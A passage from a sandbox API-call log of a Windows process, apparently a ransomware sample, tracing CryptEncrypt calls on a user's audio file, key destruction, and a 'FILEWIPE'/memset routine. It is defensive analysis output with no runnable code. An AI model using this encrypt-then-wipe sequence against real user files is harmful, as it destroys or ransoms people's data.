out: hHeap=0x8a0000) returned 1 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.683] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.683] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.683] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.683] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.683] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0187.684] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.684] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x2675, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x2680) returned 1 [0187.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.684] CharLowerBuffW (in: lpsz="byte[9857]", cchLength=0xa | out: lpsz="byte[9857]") returned 0xa [0187.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.684] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.684] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.684] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.684] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.684] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbec698*, pdwDataLen=0x87e820*=0x2675, dwBufLen=0x2680 | out: pbData=0xbec698*, pdwDataLen=0x87e820*=0x2680) returned 1 [0187.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.685] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.685] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.685] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.685] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.685] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0187.685] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.685] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.685] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.685] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0187.686] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.686] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.687] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.688] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.688] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.688] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.688] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0187.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.688] CryptDestroyKey (hKey=0x90aed8) returned 1 [0187.688] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.688] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.688] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0187.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.688] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.688] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.688] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.689] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.689] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.689] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0187.689] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0187.689] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.689] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.689] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.689] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.689] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.689] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.689] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.690] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.690] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.690] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.690] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.690] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.690] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.690] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.690] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.690] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0187.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.690] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.690] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0187.690] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.691] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.691] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.691] FreeLibrary (hLibModule=0x74f20000) returned 1 [0187.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0187.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0187.691] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.691] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.692] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.693] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.694] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.694] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0187.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0187.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.694] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.694] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81cfc90, ftCreationTime.dwHighDateTime=0x1d5e1e5, ftLastAccessTime.dwLowDateTime=0xd71f9320, ftLastAccessTime.dwHighDateTime=0x1d5d87d, ftLastWriteTime.dwLowDateTime=0xd71f9320, ftLastWriteTime.dwHighDateTime=0x1d5d87d, nFileSizeHigh=0x0, nFileSizeLow=0x2675, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="OLqMC1.wav", cAlternateFileName="")) returned 0x90af58 [0187.695] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0187.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0187.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0187.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.695] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.695] CharLowerBuffW (in: lpsz="byte[9845]", cchLength=0xa | out: lpsz="byte[9845]") returned 0xa [0187.695] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.695] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0187.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.696] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.696] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0187.696] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0187.696] FreeLibrary (hLibModule=0x75c90000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.697] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: 